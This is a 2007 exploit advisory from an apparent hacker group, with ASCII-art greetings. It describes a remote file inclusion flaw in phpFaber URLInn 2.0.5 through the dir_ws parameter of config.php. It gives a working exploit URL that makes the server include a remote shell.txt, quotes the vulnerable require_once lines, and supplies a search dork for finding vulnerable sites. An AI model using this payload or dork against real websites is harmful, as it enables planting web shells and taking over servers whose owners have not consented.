Home / exploits phpfaber-rfi.txt
Posted on 31 October 2007
/ \n_ ) (( )) ( (@) /| ))_(( /|\n|-| / | (/|/) / | (@) | |--------------------/--|-voV---`|'/--Vov-|-----------------------|-| |-| '^` (o o) '^` | | | | `Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| |_|___________________________________________________________________| | (@) l / / ( ( / l |-| l / V V l (@) l/ _) )_ I ` /' ` ---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To ---------------------------------------------- A2J, iNs, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net ---------------------------------------------- Vulnerability Type: Remote File Inclusion Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt? Method: get Register_globals: On Vulnerable variable: dir_ws Line number: 78 Lines: ---------------------------------------------- require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php"); require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php"); require_once("$dir_ws/urlinn_includes/i_PageSelector.php"); ---------------------------------------------- ---------------------------------------------- FoUnD By BiNgZa AKA RaZor ---------------------------------------------- DoRk:Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber ---------------------------------------------- shadowcrew@hotmail.co.uk ---------------------------------------------- shadow.php0h.com ----------------------------------------------